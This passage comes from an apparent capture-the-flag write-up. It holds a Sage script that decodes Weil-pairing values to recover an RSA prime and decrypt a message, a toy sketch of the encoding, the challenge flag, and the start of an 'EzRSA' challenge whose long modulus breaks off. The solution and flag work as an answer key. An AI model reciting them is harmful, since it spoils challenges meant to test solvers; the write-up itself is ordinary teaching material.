    # First, crudely drop lines that would obviously break eval
    lines = []
    for ln in text.splitlines():
        s = ln.strip()
        if not s:
            continue
        if s.startswith("#") or s.startswith("//"):
            continue
        if "F.<" in s or "K.<" in s:
            continue
        if "load(" in s or "sage_eval" in s:
            continue
        lines.append(s)

    # Replace ^ with ** (eval() does not run the Sage preparser, so ^ would be XOR)
    cleaned = "\n".join(lines)
    cleaned = re.sub(r"\^", "**", cleaned)

    # Keep only assignments to the variables we need (they may span several lines)
    want = ["gift", "P", "Q", "n", "c", "e"]
    pattern = r"(?m)^\s*({})\s*=\s*".format("|".join(want))
    pieces = []
    i0 = 0
    while True:
        m = re.search(pattern, cleaned[i0:])
        if not m:
            break
        start = i0 + m.start()
        # The block ends where the next wanted assignment begins
        m2 = re.search(pattern, cleaned[start + 1:])
        end = len(cleaned) if not m2 else start + 1 + m2.start()
        # Each chunk has the form "var = <expr>"; '[' and '(' spanning lines stay intact
        pieces.append(cleaned[start:end].strip())
        i0 = end

    # Try to eval each statement
    parsed = {}
    safe_env = {
        "Integer": Integer, "ZZ": ZZ, "GF": GF, "vector": vector, "matrix": Matrix,
        "F": F, "K": F, "i": i,  # make F/K/i from the file available
        # Common functions/constants
        "E": EllipticCurve,
    }

    def try_eval_one(lhs, rhs):
        # Strip trailing semicolons
        rhs = re.sub(r";+\s*$", "", rhs.strip())
        # Points may be dumped as (x, y) or [x, y], and gift is a list of pairs of pairs;
        # eval handles all of these directly since both forms are indexed the same way later
        return eval(rhs, {}, safe_env)

    # Group blocks by variable name and keep the last occurrence (earlier ones may be incomplete)
    last_stmt = {k: None for k in want}
    for block in pieces:
        mm = re.match(r"\s*([A-Za-z_]\w*)\s*=\s*(.*)\Z", block, flags=re.S)
        if not mm:
            continue
        name, rhs = mm.group(1), mm.group(2)
        if name in last_stmt:
            last_stmt[name] = rhs

    for name in want:
        if last_stmt[name] is not None:
            try:
                parsed[name] = try_eval_one(name, last_stmt[name])
            except Exception:
                # Skip malformed blocks and carry on
                pass
    return parsed

def load_params(F, i):
    # Prefer task.sage, then fall back to output.txt
    for fname in ("task.sage", "output.txt"):
        if not os.path.exists(fname):
            continue
        try:
            with open(fname, "r", encoding="utf-8", errors="ignore") as f:
                text = f.read()
            got = sanitize_and_pull_vars(text, F, i)
            need_keys = ["P", "Q", "gift", "n", "c"]
            if all(k in got for k in need_keys):
                e = got.get("e", 65537)
                return got["P"], got["Q"], got["gift"], Integer(got["n"]), Integer(got["c"]), Integer(e)
        except Exception:
            continue
    raise RuntimeError("Could not reliably extract P/Q/gift/n/c from task.sage / output.txt; check that the files are complete.")

# ===== 1) Base field and curve =====
a = 58
r = 677
p = generate_prime_component(a, r)
if not is_prime(p):
    raise RuntimeError("The computed p is not prime; check a/r.")

# F_{p^2} = F_p(i) with i^2 = -1 (modulus x^2 + 1)
F = GF(p**2, modulus=[1, 0, 1], names=('i',))
i = F.gen()
E = EllipticCurve(F, [0, 1])  # a-invariants [0, 1]: y^2 = x^3 + 1

# ===== 2) Load parameters =====
P_in, Q_in, gift, n, c, e = load_params(F, i)
P = E(P_in[0], P_in[1])
Q = E(Q_in[0], Q_in[1])



print(f"[+] p bits = {Integer(p).nbits()}, n bits = {Integer(n).nbits()}")

# ===== 3) Build a 256-entry pairing lookup table =====
m = p + 1
wPQ = P.weil_pairing(Q, m)
g = wPQ ** (Integer(2)**a)
ws_map = {}
val = F(1)
for x in range(256):
    ws_map[val] = x  # g^x -> x
    val *= g

# ===== 4) Decode gift in reverse to recover the RSA prime p_rsa =====
p_rsa = Integer(0)
for (Pi, Qi) in reversed(gift):
    x1, y1 = Pi
    x2, y2 = Qi
    # Solve for (a, b) in y^2 = x^3 + a*x + b from the two points
    M = Matrix(F, [[x1, 1], [x2, 1]])
    bvec = vector(F, [y1**2 - x1**3, y2**2 - x2**3])
    a_coeff, b_coeff = M.solve_right(bvec)
    Etmp = EllipticCurve(F, [a_coeff, b_coeff])
    w0 = Etmp(x1, y1).weil_pairing(Etmp(x2, y2), m)
    if w0 not in ws_map:
        # Optional: project into the subgroup <g> before matching (usually unnecessary)
        # cand = w0 ** Integer((m) // (2**a))
        # if cand not in ws_map: ...
        raise RuntimeError("A pairing value in gift is not in the 0..255 lookup table; the file may be corrupted.")
    idx = ws_map[w0]
    p_rsa = p_rsa * 256 + idx

print(f"[+] recovered p_rsa bits = {Integer(p_rsa).nbits()}")
if n % p_rsa != 0:
    raise RuntimeError("n % p_rsa != 0; gift/P/Q may be inconsistent or truncated.")

q_rsa = n // p_rsa
phi = (p_rsa - 1) * (q_rsa - 1)
d = inverse_mod(e, phi)
m_plain = pow(c, d, n)
pt = to_bytes(int(m_plain))
print("[+] plaintext (hex):", pt.hex())
try:
    print("[+] plaintext (utf-8):", pt.decode())
except UnicodeDecodeError:
    pass
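Steps 3 and 4 treat each gift pair's pairing value as g^x for a byte x, with g = e(P, Q)^(2^a); because only 256 exponents are possible, a precomputed table inverts this discrete logarithm instantly. The toy sketch below reproduces that encode/decode logic in the multiplicative group modulo the prime 65537 with element 3 (whose order, 65536, exceeds 255), instead of the Weil-pairing group; this substitution is purely illustrative, and `encode`/`decode` are hypothetical names. As with `gift`, the list is stored least significant byte first, so decoding walks it in reverse.

```python
from typing import List

Q = 65537  # toy prime modulus standing in for the pairing's target group
G = 3      # has order 65536 mod Q, so G^0 .. G^255 are all distinct


def encode(secret: int) -> List[int]:
    # Little-endian bytes, each hidden as G^byte mod Q
    data = secret.to_bytes((secret.bit_length() + 7) // 8 or 1, "little")
    return [pow(G, byte, Q) for byte in data]


def decode(gift: List[int]) -> int:
    # 256-entry lookup table: G^x -> x
    table = {pow(G, x, Q): x for x in range(256)}
    value = 0
    for w in reversed(gift):  # most significant byte first
        value = value * 256 + table[w]
    return value


if __name__ == "__main__":
    s = 0xDEADBEEF1234
    print(hex(decode(encode(s))))
```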

FLAG

flag{Slmple_IsOgeNy_7rlck_tO Recov3r _Fla9}

EzRSA

Reproduced following Section 4 of https://eprint.iacr.org/2015/399.pdf

from hashlib import md5

import gmpy2

N = 2626873037643746561974769422981513211235600940145733298085105651203912522357225669834977174557845314049387621246357648920973841124908450808047869402625362920099631033875718731844120246968607603989013418543168444135924335470426306423424008682574616399107977060870631808018783834630827595277662445274360784688030445031320680318969166757702954410991675210232054691350012575558584612173205036590547565753421272625675674603908491218927236678404096923106644511721565721582984965669306357820808820242653550348791021857849251843419656987071949305938583926108938013048042382129506660335820702805404304812574142380718814798708583274344512355307315269672775112548357602851271720636804553641775952725102386814193793962384457965326585140258012468357502461418997228542756543287366712080980904325732281220653851360710689667801366188953800669779249877332443089203632847978759253460342039397685909711176611566453656860017466140896675281014776535945729967513828615324923050738027957126520090350834152500020606323947452253592860433890522235026016928998722480112261302289942613297773075399946977464196903285819981586881896366834062238501874189786427329866600930843759621498492344936772313042677434449908459394872411035741758361984980729872112659205861623083073992313125398647693800257767836888084811412911098946546452545158818047813097101437165904427210453465027252105199931714933740508550245397675131524912775598215856423960640437764459659791642857796424919118255065510012639720738247978580776942429867581741720212543972284023652214356723410972059503917791218094616784414514590305306211412002445000154998569073316557260397492429142539182706975956897380436818321732938682901790407216343484761257845708456664498326934946090678739162441101887498553677334962952573327139615002465108845886818357071525239397833407825954151093979463156276675903107606663099954270451054187538069597407162872846768296466919167905708218829455619885591731435646339759921627056026168020349188047361550247250861862923810655217963956881273847356
85574829988862776882154768363524473539374818828908384299824216308848882671366523412242207809560112269570903755534288880517238077029668804404850957873488253419608196284126175477537649776855244346881047679883069122203574494933164038104215674722480270839307992060089107557173529817226915624039002425442962604653251523662793562302948157963834734511990610199250492669011279483257022174561320245102816697283894792599519500096328055076495550784754626362459124478973384853393612433366912871802302414981754489616490218534617847197892025078901015024186905424685706468258844122460664767507501045158359687348606957426176260707766623079634668190384390691354502648857411155461445858150246866497654094404554892678658557598245819327074015717943352528356719295716857386159331337422964151492687041155196573775179107857901314445769857744220991241443611270543587437725906869585303153637531413843746317490406065010366168216755706655648977893096348374112178720164236202704325145900266118508608994311109203315759966828924867187517533294293972910577959063147874743952340294393415571453560089621118829824936385430793361512576356987988261493126079437078248550953595392676096198599644245989771061899311955932880551980936779801928282101095876927147262239303495059699904597102933122411846712677613459381251348488257171714636763324903685705577202341383035452713776554688067334589679973018165977477593906716893643311999857804939879155743027547314768220990112209635344939641759201890454894605042000542856752214212096755363152393477954122925158970032179413459057953038125276113983984299160430617231421314247750031433638403742101975901131052606313970039777733668060041981953985373961280590809232354513343384344007507031151784579749611577503734763989542891333957901563412843592787073575205104226330644681875844870085030269681729340306993878674656967668625693126546845336843030312449282664084929419412449979011378308729836132323431277808012433152982074277513076194282294143634589477472882714494917675468672988566532607731596103602246132
35991580321437741548913137614717194351831492020374319422093978820089700261656645495985705865401897338354798682700954839093849713504951477113008365892440725328121665379685713727905912708383499947115588761662531602760132422900714327570021014455278868767465209977551645140369462295892862251367715720188079811263438287919259755214448402646388416244265800505983438313466616412699289739491972688127128151421826318565894513663885965421660206593927969036793202534737654646431844581393135442269067187006986125741071917437311269744311613508289452393879034633751210376456355009205791647800980592544046945566530573332333321953011523780913018355524646605933781924809922753990747195004993722326824912663519980020508596584468300360450920906680161341779221555395151128528762192454008519639980623498448660790190943147387072342753752258207452332024701564787345572234397512649357937747606540294797175867534887896234712556710287966713901102069147078145870385487796708451939327851936633752084539904370996753643289751256359315978157570395480111786935447912726674715455027459955662324899041526446592999574864650790610624452536617736835492738717140777527036142858959329494881125645462892493970727880915296495492719020874791489815100467660208951985486766976266011079822769510014341971693464723492339127722726260240375306279822244976625314393042993182733859006230742102847137470693059124451847878821754281181150561618727855166734455162808466033826702227043981332351991220286743979688362019835681369871464388154824903764019173547117591898593116467437952904384814151897572546824244697918118299372853683682439088746388045606171605938674028868322111415426248609640571042495282284522330249075172410235361701395474364146423418082851585079259596240879580953786684229355365085076615777644309135400272659390696452606474835790751095016675694874866364760497773488851305804997049662673607383972000177408022308339550082661473881288653613678584592276922801136987665880064592665238913981253224937112908480948773156318930066433227798713896489
10215284933816366301860396532745154119935000549731309739498188428474041415391152579804642130620162419014049760025929535624000088922468881068897660570993347870122720480548202160780932680666389629748798443214456581623515550785286708435825068748726949664714466686804971932911463316220848373541219585789023224541865339766326029955984744548592025835641247057676565702431267409687026724444903186585511792699443844347960534794835300028099135514555472847045122982299461250016050744814691464007250730384949098572447389245021978043806230366791941209402851723071231121686574421140077898164834409710017479855008294688785355374493046737594967775713314540212382227176044250474324032098672967419997702140880015461770235458481821356145649863296113320239823240084702837352894110870224130667134213909527581468965177281533259747914206750163806012467233041283407096372052314619535475363070875355268209976849068336811216686116748055773085052854604892537828653387251793517206557465739213846603573238709835569368458754868231564925615592104506060970087703157364147490047975832347284243887753157702141529106582574652893327694369800666047713904877910987253792423771389165964282045797391591177412038812040636034903974450335989864849632765806808518745706281447527279021407727197693851609652773916588896720332928751369027176128755988658218061620954647888855663400734147643784417910090702251320393190759604223866974911016695774855364247515665559686168975775256546242446559208707433255571555115650865913672982849501647950665852329334874070040521415079391653810134440416156223093625718929022554712657374990340634083505186652827543162710651277956633573065425101482120869245994125943994836689926246287843749629893655218532634760171153038152588966156267543146521300199411708462523860313894715999038827872209427477139072878443836988620561353586983767896940560116561584438206436721955324382351409193852726495754707280963012314731450792900778415713483603308905917110232347473878568452525043543515029497637731422550613755267803088814726445
85459183776452912619010325584503603599034438581179575290652990057656833217248483260901046092845793726642724557513996900094264028215570292985118627117715149268603315755543456600417276465580304566655326593601112428178153967645942685008090314085726413441402272290030736863644148766868224218983271362471110302367194069316454856779988446242230325932107262209216440048483635276249931485252767284261457469781674196028451991707612632448482816581656727454889392813496158209442010365984766862134168834768267805321627922915546973387815327917630971668123862873774922440243766825944220644401004539677287216829802631904952391681751656306456934994928011931271725767152090450240821719705843795033160898451714676120738187497238064360125082229616506948379235029843626230532378446810050428143456976522663096012881173705774004908935361230992719557873720617543448104362909445902998389528983725479021988330734666746850544869492221840027545245963464207787164652141948993425591411804995160945047672819207314088582383869221444413112502109954893304877537473498448186293754203703635935382956807143960521161845770808003378978161213392865736641855197613864162383865513477885768305325527190508208162862492202676240981235424161456637754334372644937955173052555240519437888614581453310072602123762714352929657555417350746759997535470609121334907611281626900638124710852215800184109297466712597813535823573529844445931016402533841078114536362033775156332217766074612823329273365101804832884845113615561785269984114588034413153309245084490761433299069476183493955265567125676856435692372365155311744544227591329566408429476412126202212820247288071154687535054356718220831098224523205796323056720708811861553888799301676832586979642213601909246754991017713587487997752596140907458762948687057004076684530259486117064710645997044252593312302411782791419213139097514607651158404078497892055789719165034785909208085803116018175920129556895588561584439795940886181214832416983383951998688678181177296736701102710686681496747914216262098395
77419788512720491696033134898027936068978893237450051184740987991533375363545315672453884232901353891746884505129931585292668926507386274878178257644984603172614981440551259981094932199823883956929945556941283260620680214858306890634759716282763881188890465044625602302367309431761096785628609220162660529350818503334992980499210798965087727307876433613834915771671777929622281032835325355335273673161178630545557088511390234237282428579432176102385950441317973440728284467784011112830776317668105415607701351800727810290801117259611178340522477720092188403214413488758395503100352332182171379424472931447207051060698417135749028103008212120682294503730632570241168387060967446047751029601460904635978177877336380851964258581301925268757312720579870577997631544137530211301610096753698096512983769700072645544781232457557239527562128568139324241652816508958498977486782831393309371120230015141509072490142179261284969365433725698583594217329390276446980861830739027981139941628975124249747787901513997505252208846312425524882460949294973499625687472493764166731435469365723376001102783928161811480868962363770419770889894347860462982058312259528217764670671305187022716877815193143453561694160243975770492551663593593443350204687530826640746449449278019538553104601391185098185776108661045437660669694553596281949836654554092835182576591952758136288286995200802506293507757980181654831833667748682246102943679813455116941036534282833543027452737212200683302204683465404574841733634206039164507443004970860205297714116686553680268537451382918517605916982599531591684616218512866344590941373653702944695477424120572617618147526425244049729633465945390206824474025703948047587043253963059027927441691806516067351365146141627697771075541069150425196153974816230431080587202237329961013163646896052376591337713630304203652874125024731236813007535299449732164344556761546053502200918590898800241563073677014619706386585073153219713482270312469872378376840802791455356646486279152963620782112046605626211198
64268188674023943054993640552938047844147799756525914265284826089951138536365102535421893205474365097883184925248618265290039021800546305272556200920803324877232944141315279117377210298565454595182718000585959182222248656537319921942891630682735770865310763329292517292648889118433417788481326846088781301386290970715968249624630039302427179732185671674389824234317843615960134938652820810348444575324598836034148205928489826122856242782717951881860788497995338289876787529818297164077448964024036206365093558740972394069974294502096918189737322603262926564793522974636437417151320028412215894378778189353312733456445620751542534920891162435735391341903855534178246105493432124165268217798085517616620984082217809469800756194908667351761967103334083778687722514121357748252561972088776791487103351023692117015037515002539203235093843571321864952058553585615515071642238144531453867612863537494524454347615595772548688631898364946475358810115613718482358772881505261623127945839973152705874554006441009176055326903095046557103439067466116902229879553176177054619844327644943767111048221661291291749600088405912167874251965174096346171043665348381586520904427054963993616212186034144671819939521104459898733649046859594958671112048080195521478846336787202650107507738271334214673812657825103591391681371901548608847055592422688147239049337649092079237476449079649453181582245827557631881496406817305751943221795308839127950236477734511156788760115150486970256995155988045792718119688785688098418229056167405832070151900938737330920452903346200299466024843960669531177767457021429466931962789700011542790467965650657141816302727383387488570181241554024159157764085749704405745462065133680846842979824019368805548385539971440889412422650902336336859951446538360725997885128469325968555672080613171198203512070745179783664576783889046268598990856741793621896805473853425077022553222720465903956091572026906997509178270264513611688090745889798226789197903517954028694234790155817862843707631353512306210281
03417825350317628527376208170432100961434971132087394111328544403921074133574294047379476176926411585869917949057336421485870068161999254580563738976080252184118829051852603448487013421896353333809006933375637880996517877023382895579202089804837527269005327505757235179590850431684727609629752395577255345230200861031661371618309023907275011449814631433420444292962069974532143663756953415147972782877960105166529708979868872128192027429859027089447644910262732535326666958410468003942826432011863043846663339706226039591898702251818548194574043245316481639656839723207311412469614694291905481818824297059411137000432126721415749397859925802236916226618927716324232605528552847635723681584588172478194141833689792246744442628547709618329860126817547677496491318879499481827555120707067533239992906994781805156820938463559952519021005500451652459957168253700487236773656573101846836114886807252692983363094706139322266427816360231984257894238417622921325800202005484780245625714600516494864922080726791397909925982813574817226201465295034879163030121379563071459166569081491640691574215365269455580889703627131035449526638018314908926246296633885760931722887687274807301173607490260512134228254814369846228720279576228028819982892948581176208505971698634075659080858918271605238272288614499065116727126877980722766162094082791089035290924467383440291922278222610914049095630559385317319523798566040844487366304255839625165410378090469421086436855421677163913457967192339172436644174906402751801143611528876886953871168310465691219344184891611923454525610038025179031981736265120692731390171974740712250316149745362173603058265266314497147902180190282736516393336955398776149297708505265143616832390718126341575107730762837181506757236559586544399080029198813171300846743801074258459144185329503471412565102186365392309031734754074158680583898408278134159459118343669981792752088354990228686201892687296572372911630164564166985691794617724715825501872834073125819431057015259006151662859252794055512381
94492457890469111262929975054714075425172740793205706465085879993260283654930968510214957890529594432246165140287325400548578330226693452716154447055333409420736028672949604697955659002072625211328387435132767262972138671688339160530977898984030191510660745084348809760011800862197873625007599226307416619328705092886689783290349825862396169037919367881086095739872817074970775054819180825867602808450175899528067253998989521681477390505040422756358788465027564825235405310681468392831888439296942109988315427821656795237826753350249650760694098487578946390365452318013291537165872128480771302652138078464542465675922776523659957722696704338944564128885834044659223483893135127777794983838488647844810605259415930450890700327424788276594538224967829273733136830117828330850001331568585996879856915007447310559343627261706677635643143221752631669425431324537185715707320664404757885487211353196233186958314487418528214723637541326019246268894832286869262502979352169436266854947280279850235495552062971550556261262890120778509317272869787240051005464034631532001802281701291209130727171155097176519945874434533283010709668738749320856375769028351431526108385832788310997627221371943649313352550105468848023756920396154250423119182102931669524200926694138703801827726222690604614455114556007898262464396262869364955833361288991814389888077050920701104863853619622426401382993437147044146312017902843717666468213583471371403064971423211357246597325730271552146340179762185661886529871646572468740673836192436924967870944973349231058368028668218111043677383548322117807451829234204970520956198028612916749022656355887047432029688803435520383706252674897436715272219014551433599337923316588982976281369937884520986531642841599919715793887008730728390918739141229606267751199865526232052967959274148784642919589340709953169392153313072090558379551733305593247706662674411352235726017916269728079198195516563525715631980357566329452119317832957961296283596644412369332236972357841403603217848852880488374846
53730006162051694200938380662343409352108526009652757608525012916993195868420754424719266000600811901968044401432132130768946219913290424210148303495820434768036325970514837396974169951213672466111015118825417460628188353523749620167501803366020202398100845923472451774775481389411715101435018941540701993403374590601114750081957450761370908301971068697157786304313946744751178875541113928388278200348395348785827124910090164942760076116133389427058943393519089582697403974585321506060036396587941548938338034964720444043613087923837153614007929409383935709314584241850151791390703547764200912970905464187551630110467533765230822964880438617866709167305843273558868137028187597181410714835644794470619557368681500157815157920476495122651203223509237926597737906574511515188586139171264914647695791258150171333556197250940183063783335358375638690916841040477811097440500676652001550039615325227305542227509285186173170612553160992958921634364114469167574475447786431733012872963039315359803671203183571934136606760485400682300250088383020137983011440073211754590615279957706953350939839373050230208808713104197936425940970644579946923680624050857516611181057508680833102182039099792809271000220357791011580683574823858528943177580041888534965984061522300399015711743531760458381265130290850563808130907996653607823381482594858119599644942960079906545487478922353883358889503205995070946920281789793059637356618989063937278580395097818325949012695836563743962495920897898927675689339510771418914906994681396553300112845241356232434855820365324139025965473903917738214154783105350327414341298600816319122890283413448122886740603139334960082101948565084917657720546835753473466786066534695902824844605709031282509090505598784594086362956960036824861844163167769349313181615252120243714914597070513306041449178964390837843979445627340516703780258489762731463695876419973252202801498554997787864400559648760316142876091112028255969769907470083119393191273779267275761518423078500644551340738240899318945462
72396299959483191137274443573728071672929886268851555698616018294803032094593215074238999950155973771691192660194181399983390004730551992949013685957055370955842271399976569603292738434126138000001469435368065012313554637655697959208453562318459971788975496384863313528175496367752675684506972957158568797828785552377696195338214232554810019663085277030415682291537798901740413812645397996898848100275049387000193176606092223074325971714537717632896260152629754317385874117995126078613643665121057816656012107518711552470321489123604679536638736859636902416366692105326962702863639166354030273258245753622778536091837587444796449334432973079357846737779166432146019839165590740043835814443644644050965638767432018891150513581100193755356398284403277562251463352579942399157070387756750038593398478390749895943958933535661062496671865827759592664789181731107748735926871843363133199230429178700616531707342944321181993073222724473551503409866071146936525953819924944642525206117828839042938970118209066682410950094599807597193256486001644550809625510241182026948365028867091890278058537265857527976471979815734313969203201564023885266725332441681878205658591163790863610213817172894675158150093528641930622635281223601952446709992040164358211194062992496652948062912269070519206437356374194166315530266200070423367824878035949461626207695024556388843093459141576628196313126828296266149665949580139337602639543805820174266921562030936761169650625603031011122734404243625474155577750068750732463671981644575971641512004272326432906884854111585511507378821240218064221995888233351586541505284510962634907457037324796130037886647182839507996722077549121854377331696535861045616192999440930084991236814274664864767659472528141868245996148908028073960243614517267963556810254915054336804045440047944297168465293759072698537263537668967098421634155587006130026476046950651144771787808562417435212644210295442836012433694143065575883462756942695724090199491262480799815206522024204581798923538680121111359209
76391079894895959215203178961445608695331179984113804548172572078292768729433577298816343134075498356090025520509862396314010257587761751349297340561641056336945553035264241216160096525899480752820545415568153241512025381970125735911667702284767307038945275111530821707144234582345351362591692497046357568129979748131529678140064668442625538112968565678769829608751409285739790766356728061312793984044713359134399816879667846783941897707753410114901469305134248140247104397620540650699929937822578413326526246113186771241467261635957907819397404184017632961255710064019828970355140502573698519794519773931576105421102485004484700164259774030723069579772332860189257977239565201020296564605742243298590538677590111380205348787992005803199929594807818623408367970091533728610717396658588674798341319434372471567880898652266175410036825557689983652185628374693082165501872984190642560546547911956223641410205570979184643013445493814759132505072231637442081022283538972750806800578663959639323187957014010648049984208200000695372956193099198076673416239436992340811010238924198351177345447303287249941423047311784051386940539319669569008121487286924899367933053970629389926799361839625300975332142790086397121383230032961227041100489291299896918925681481944180332339207227632276974721100900098794682473014627887527789878887034331603772785552807602947901768605041937213945936512085879914102410902780477772705820112406561652132444451305651370825156285124830026192196953969891187654694959439756247993440803164405503650583851336014214019217903013465646481165039298695425053257514372261733338720361968903096034371382579150076966684732747805253628534221003826674333368902836370219770497343300225162994277260477932362647695814406768173435292989627053708708270034258593267298081804227331015190429509456942656790353364883174961751364780795913270521809805561628111538077513354923426081921983601953714372783550480333637266616472664433974982846041797696038096575827525640636754886211560240053436728877708023733991738
08278277914516606258928171221237804679820490176023437422622455330856378649763556452045979532082906245250152898025489738319631072607028494924829232044261515073391274751698510584285536479972756748985840341021680856742912476369945399544427602416153430617951511452733718757268240766934750814459022665643203905335860855004341033897843465189829536511488093067445947058371077376542356926592127133607185839232808835323917066618063846771113535681906543350832251781810130694559068581222707109539460161776652375571663473939172684242009307689465440270057494071674955621283256055701536484738216693266856827192489446782061225210275583743004681000473538421192890922632681616865204832954572523033681521777374407856378987829312868005617891827722273803435079840530601693233845182650303457492245738966892493218199298471597761930075132970327204003029485103482551173964495456171516718795426548064853975574370531021538929414433406390266800936786866010892004823926733561753569561199295757642044587658493167601048083419709181914562899841279868516474065051396531883853814504606048969031935552476767755986613824201556145588837703667522611668665262683182146664755434314223268332867309377924766502600172278256735299702165093535704889962024540717989351272252446485708930057933868877575612354865839400044613782145000202282436871331260032022367491840627281347368085152553780936876083690538659104931937961638252205877435625986847595819828273380234663539797461012875490202341048454592061577058657742629709105845406584110915742618600592152520248640927809643431631919709792759993148254553752872557960006169596048234378640515890888264646976973142449096573932706593661249026855396948451043355072585620780014918583182488996004197695641482059438303585382654848774071057954031187441919980866703677504885650470533836979538312080552243696331694699844541344557469015725943547765451534447516771649127995677450461338614145349863508085705622979793042048905509817132395363709231152870131537765404240094630550247333824856794241839102590531154106099
27636193156753238950231106273439484629626104283147413442852708332803211700873415727320137364862791606944404226255555457506987883158754262293792168896420572908955392153048694714208148156150403915765731975258571905729426221410475089122361646216546920878745340819424051514394983614008939048538255935151596148917173271376996551216123709348635656861053331508137414385009165237257314935937528202760450485672400641448175551049310648844488630998493447680942446032739059232577468607061752906564119957570825525731123020484242130412326001949302318466309611897729494844446029194614303154886632538438077022830618475128019991002632886792746264200134273861341013866850073105387001911950121055275224041952930343252952995759744242113286495167424159189704508004449339281954454770439802281275565534776759410709863845756528627937868945796104937378085427438587742083414485007984040009281791054133689643091119030718139714064667448116950347075231749801352845197897673848841303343380856012329868335657371425313864966583178798122737732394460528363283531816658087638485572298529058304582003954826420909417919738265794987621349980951085424131061292783605659683096835224726389086189102073336238786864761303736180313749385606648806245298560583260894806797307660517395336235196028152854964188243012755684236593150792927902706247092735537346495619609105459331578136492798922451253661879815799654136362595872191226804428373213451716275298285432858714339483362585442430110401136645445912964416825241404761981043109244850059570826901715716913745248073967779285005684849908774377078451533159864636183388572440914891410935141412390064081205068650594814406331338538513688753739468831387344715268659859708182270343588226198075267403331563384548638504431218353954293522679679981238696146872665818237675556337584201060583086877116699355632385317374027331621359300929048396920693156658254059147757736541541899873369242905069925415015535354340244359988633794602526207726955021308552862216817327961901451493762067638064005196800525042038628694
79227887931956091389783875723719920420192560428544153759269698702391198382178016690832206447864794184477653761171257605724645179327545267626296322477280150874192367918549031860789302930405038552724777723533564540907193431334193365475139093087328761444381965283389835571032006252673972232041600109427512008643036034271405315792798313316181110967848046520905253616123988380651759565176162463661400883611874747708559018468695116717293278288619363618809289516479485311469534787983555143379228460503863514516012448397608689036110147099907608133605847813321806214426982999949028638719823019764522414979012839966911114369621168286988224169668992471018603188781301417108065854273557759907201388730171040141292784835349539266195186224628234116979514669343432970085548619344365098512075004557545780815146228113209382268609004854799964100310918693015721358303098934925887911515793856513123367011050520762903952861738760090342474507189272364270072010318507915487805629010470331462322221005680859437286599036778831328856717958603667590378309139679352745851530687338491145729481830307031562811075871601533575655286092239140815774319065844386878920784726460459598487610949247016199798193849398002466166085942859692638008715212317888019042108688496539654629622307302759392201963602431096776944618918271074064133723834554680028732013972041300265835678421320258519223437151757488289189812784530865854046277565206674189886507550678128137427749867571397584134358452791893931001696780679873329396265644048397722776562114450853683064451754730002931071994534950247401177666179759483417010116471561676091387622254184808716390025927664334902644340671806488264353597827421864636969291178244412728854764421373495751953368223308739794914155345397506972735024525152905162937857356141260765192710619179843046342832712134263210860160398709459085989459558726225735848911508919622596452262170849474712710073794219741740005477051639579741235962114348856319457727378367321925125685068923264629958598640594382534666383194515675200426948
19573629620767394482001511572944348170370859904582521371535833780621176292333986584835290361406739223746861586705867442668054868581024059122217394720851214003797264709442399633555700559846611689371816939660983670603180970425406155263711493633614286063215271233158656933711125816559808257774992951582086999342162091042802005890265900083712373953716953232561105960902909577133485825253683324404426747319245627710082348783320819842938261527802581247900265278619558868761350091837842942121400943577028099632719847617581752694040811571765186016612680742281130621545647464284475307954667236363749805837529033157816977696959264917742895913025060121991744192245251825484878335581879208515185930647266708408966148730173445805607291215156027694075725756719777203936902865063337063295356044190785182380436380916376120076967516091161390740490746440480359810211837897609567512868836058830163259793869930218785706404446667855873636373635491198015010961037245268469148797119560712017789873158064246377095064420678737885966087059115520261476208444413512052085626492989978286994116992112465698342878716591760128000744792118071229657550573195186994007338002571268623794949501920095526314582221447324424623644973193373870477497928709979130819124267653114601855378952230023860830996123405710107798347148353249003795685124288049239536210864151649968105747411024301733943520176594206848681155649517896576318218974802364929214219039996283674122864431798326180721213889488733659515211902677625794662788157279258839529593499205608311925443411090734199289261556177277581354959502425757368797974739376940769463496106593355364290047770397859990348212545357277895515466801427204978570840441539740408012001421842786708946881063187018950125002636946678304525896803369823683489650949533707593695165537745727566737560930672636824869139134302119802385825755665962417074674237731900593028048820780748457217393749182099099679494405543093927999904773102964355736751539345065631625753748472167600246948676520761855779950929692221333219286
65889300533128222545064699618052773027810350564304566378786967304989887872234860387891397589244884078521393546707330570461058352616680626384616585251377921116088429990277557133673566625162348176895324228293709482400655949114563611969232762714149348976053103974475281113948289140647827095989338945853239816346036717959652476760160500827585054130150085281636907381916952649786854210354555470865936964448321585159759535381814138416453153531909650167363722002053743008897474102977969210117213990506323677649336875651527107916565010762928300574015496632404783949419638384419892816956653202086469130842440275077214755747998648356509203407097920332381158276301015753328191176315452779385232628516954789681102773632686263780958110734152844343857215086255882119016561238528283308143967705364041662107921824542338708392488048648267224414890740509747429616169877306035942042229074798132419374357622383522680543357380789802177819716365454778126054674940335304606419380538358029113079029182481604908673867096404130997769522664205268760799526736450977949877455817946765202275237892682640881352320354177522550535697162033426729869179009681410339768433952573126909159375213650796835885448836100195460855278117244396625506621483139603379383779079001769094164460928185197248991017171624590338326777868852218517274688490964731085067624863662577187927789691514506610995671103614859288973679295766866410578709145719425820345689950757976376012811491831695992127124874004176819528346774730869860512418509315154745509263850808238551697524611477989992610442070017910579147118596013631148677203804552047378079304123249252863156965665725510038960537273982598563847087635737249444752791732688900349665028773341140448012592488089073897370450456495634327361473194868217639780831559777629778379697324098377329861232003131742826142129112395280132869568397977730719817291779206465003786280073351935201940488061474415741283681716403473631739370159261251350798540467220718742944339583528213243776527539532440963570612665881828623189083
46934052596866088255305447635342192023760607747495538426158450717060048163912214697991513252194059139157489080916665742446622187217186277637533164356760935541622096138026463560133181068834242872723573717396200586262513342625958009995858819709881531334770803814046632256016071189781897899571328806559321372175674339476445847858880611098071788051752681080624684638820200333738279786487872774317802438578233658386112353270682202543648776318580074530161446760550121928254686888858364255344244917484771877607268030199948325915983879592642850747686873742438277613577491669638644811876637284135275569132965146206120403377842930398278265042758803098169554520860052497583730914291361772196788876954941987071823213461390789885773216720926383417565489621745280323825279297350297751892262594283310853472735692962178906682374591854176197456718689023233224923002638484884446990564054493883591365687688789538821526733619968742727653164157319946145524969268409375692245573049561736480574029295539479656937713487405935333166014021085009764107220432525196097382760410059245783574332714787690702911249718999261819083416681480765773058537907927923404250658721026208365562341160007110816721772968303893474018825990133202824186027941358954441836563419263354384572477588049283762943876952595785676086094985160377829853748976852110043101469914498044486229795881438289791007328963241470193864134868704791421016900779461578813802776346167286810929729522095064147938535301544824414908372885872354571221314352005218513565406405614020713355128020850286989272322391337595804501939050692320858087425049959191492072785512083829716709097037396040549395006774223913903931214616761346885012619706414210887060806537576638042416638070498076991717888859223011112094175746406930301113055010308461734727355248478